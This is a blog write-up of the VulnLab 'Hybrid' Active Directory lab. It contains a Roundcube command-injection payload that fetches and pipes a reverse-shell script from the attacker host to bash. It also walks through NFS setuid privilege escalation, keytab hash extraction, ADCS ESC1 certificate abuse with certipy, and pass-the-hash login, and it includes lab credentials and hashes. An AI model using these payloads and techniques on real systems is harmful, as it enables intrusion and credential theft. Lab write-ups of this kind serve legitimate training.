[hw] hackerswar
~ p / hybrid-vulnlab-writeup
search ⌘K
dark
// browse
~index /search
// sections
λ AI Security 0 $_ CTF Writeups 7 ** Dispatches 0 ## Exam Reviews 1 >> Pentesting 1 -> Tutorials 0
// meta
iabout

HYBRID VULNLAB - WRITEUP

KK Kunal | Aug 17, 2023 | 12 min | Medium | CTF Writeups

This is the Write-up/Walkthrough of the HYBRID  Active Directory Chain Machine from VULNLAB.

NMAP SCAN for Machine 1:

text 
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-15 11:38:47Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
| Public Key type: rsa
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| p+yTJRAkzI1unN2+07G/CQlLIcsRty5l+ogVYq6Y4T8kxscOJA==
|_-----END CERTIFICATE-----
3269/tcp open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-15T11:39:30+00:00

Domain: HYBRID.VL, BIOS NAME: DC01

Looking at the Domain, Found that this is root domain.

NMAP SCAN for Machine 2:

text 
22/tcp    open  ssh      syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLl+dlYZiceVG9g/8U0XSs4cWJ/6msyXPI/mORr9T9i4oQA66eYZSYwrxEwYwDZvrhXu7foZtEdeu3u6uSUnl4k=
|   256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJyLrRGDcNfa9bQg1dhsV/CPQapLeRxpWJDUOQ+MI1c
25/tcp    open  smtp     syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp    open  http     syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp   open  pop3     syn-ack Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL PIPELINING AUTH-RESP-CODE RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after:  2033-06-14T13:20:17
| MD5:   3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
| SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
| rpcinfo:
|
143/tcp   open  imap     syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have IDLE LITERAL+ ENABLE LOGINDISABLEDA0001 Pre-login capabilities OK listed SASL-IR ID IMAP4rev1 STARTTLS post-login LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
587/tcp   open  smtp     syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp   open  ssl/imap syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have ID LITERAL+ ENABLE OK capabilities AUTH=PLAIN Pre-login listed SASL-IR AUTH=LOGINA0001 IMAP4rev1 LOGIN-REFERRALS post-login IDLE
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs_acl  syn-ack 3 (RPC #100227)
50001/tcp open  mountd   syn-ack 1-3 (RPC #100005)

Looking at the Nmap result, found that this is Linux machine joined to the Domain.

Interesting services is running like HTTP, POP, and SMTP.

Going on port 80, it redirects to mail01.hybrid.vl, added domain to /etc/hosts file and landed on Roundcube webmail portal asking for username and password.

Enumerating NFS share on port 2049 using showmount.

text 
showmount -e IP

found a share, and mounted it using mount command.

text 
mount -t nfs IP:/opt/share /mnt/

after extracting the files, in etc/dovecot folder found the username and password roundcube mail portal on port 80.

text 
cat dovecot-users

After logging in, Checked for the Roundcube mail version, and found that it is running 1.6.1, looking for the latest exploit found a RCE exploit with markasjunk plugins, and there was a markasjunk plugin was installed.

To exploit this, first created rev.sh in my attacker machine, and enabled the python server, after that modified the exploit payload for roundcube to fetch rev.sh to the attacker machine and execute it using pipe | bash.

text 
admin&curl${IFS}10.8.0.221/rev.sh${IFS}|bash${IFS}&@hybrid.vl

after that, entered this payload in the admin profile Email and saved it.

after that, logged in as peter.turner and send an email to admin@hybrid.vl.

then, again logged in as admin checking for new message in Inbox, found that peter.turner message, and then clicked on Junk button to transfer to the junk folder.

after clicking on Junk button, got the shell as www-data user

after enumerating more, found two articles, exploiting nfs share for privilege escalation, following this article1 and article2, escalated my privilege to peter.turner@hybrid.vl user.

checking for the uid of user peter.turner and copied the uid.

text 
www-data@mail01:/opt/share$ id peter.turner@hybrid.vl
id peter.turner@hybrid.vl
uid=902601108(peter.turner@hybrid.vl) gid=902600513(domain users@hybrid.vl) groups=902600513(domain users@hybrid.vl),902601104(hybridusers@hybrid.vl)

after that, on my attacker machine created “peter.turner@hybrid.vl” user and edited /etc/passwd file, and changed the uid and gid to 902601108.

On the victim machine, copied the /bin/bash to /opt/share folder.

text 
www-data@mail01:/opt/share$ cp /bin/bash .

On the attacker machine, I already mounted the nfs share using sudo mount, then spawned the shell as user peter.turner@hybrid.vl and copied the nfs share bash file to tmp directory, and then removed the bash file from /opt/share as www-data user, after that then transfer the /tmp/bash to /mnt/ directory just to change the write uid and after that set the setuid permission for /mnt/bash file.

text 
sudo su -l peter.turner@hybrid.vl
#already mount the share using sudo
cp /mnt/bash /tmp/bash
#just to add user rights
#then remove bash from /opt/share using  reverse shell as www-data
www-data@mail01:/opt/share$ rm bash
#then on attacker machine transfer /tmp/bash to /mnt/bash
cp /tmp/bash /mnt/bash
#and give permission to bash file which is in /mnt/bash
chmod +s /mnt/bash
#on reverse shell use ./bash -p to get shell as user peter.turner@hybrid.vl
/opt/share/bash -p

Shell as peter.turner@hybrid.vl

after getting the user, on peter.turner home directory, there is passwords.kdbx file, downloaded it to my attacker machine, extracted the hash using keeppass2john, and tried cracking the password using john and hashcat, but it didn’t work.

looking forward, I already have two passwords for Roundcube mail, I tried opening the passwords.kdbx file using peter.turner password, and it works.

Using KeePassXC to open passwords.kdbx file and got the password of user peter.turner, now I was able to do SSH to peter.turner.

Checking for sudo permission, found that user peter.turner have ALL rights, used “sudo su” to get the root user, and got the second flag in /root directory.

After enumerating more, searched for domain certificate using certipy and found a vulnerable template certificate.

text 
C:\home\kali\vulnlab\hybrid> certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.186.213
Certipy v4.5.1 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Saved BloodHound data to '20230816041310_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230816041310_Certipy.txt'
[*] Saved JSON output to '20230816041310_Certipy.json'
text 
cat 20230816041310_Certipy.txt
text 
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

Seeing, the Enrollement Rights found that only Domain Computers have rights, as I have Domain join MAIL01$ machine, enumerating more on MAIL01$, found /etc/krb5.keytab file which use to authenticate to Kerberos without any human interaction or without storing the password.

Transferred the “krb5.keytab” file to my machine and used keytabextract.py to extract information about MAIL01$ and hashes.

text 
python3 keytabextract.py krb5.keytab
text 
C:\home\kali\vulnlab\hybrid> python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458

Using the hash of MAIL01$, Requesting certificate for Template “HybridComputers”, for Administrator UPN(User Principal Name) and setting key-size to 4096, as mentioned “Minimum RSA Key Length”.

Note: Make sure you added dc01.hybrid.vl and hybrid.vl to /etc/hosts file.

text 
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn 'administrator@hybrid.vl' -dns 'dc01.hybrid.vl' -key-size 4096 -debug

Or without adding to /etc/hosts file

text 
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn 'administrator@hybrid.vl' -dc-ip 10.10.186.213 -key-size 4096 -debug

After getting the pfx file (private key), used certipy to authenticate to DC using the private key.

text 
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.186.213

After Entering the command, It asked me to Select “UPN” or “DNS Host Name”, selected UPN by entering 0, and got the hash of the administrator account, after that, and used evil-winrm to log in as the Administrator account.

text 
evil-winrm -u administrator -H 60701e8543c9f6db1a2af3217386d3dc -i 10.10.186.213

Related

CTF Writeups
RETRO2 – VULNLAB WRITEUP
Dec 23, 2024 · 7 min
CTF Writeups
RETRO VULNLAB - WRITEUP
Aug 15, 2023 · 7 min

Contents

blog.hackerswar.com 9 posts indexed
rendered 8.2ms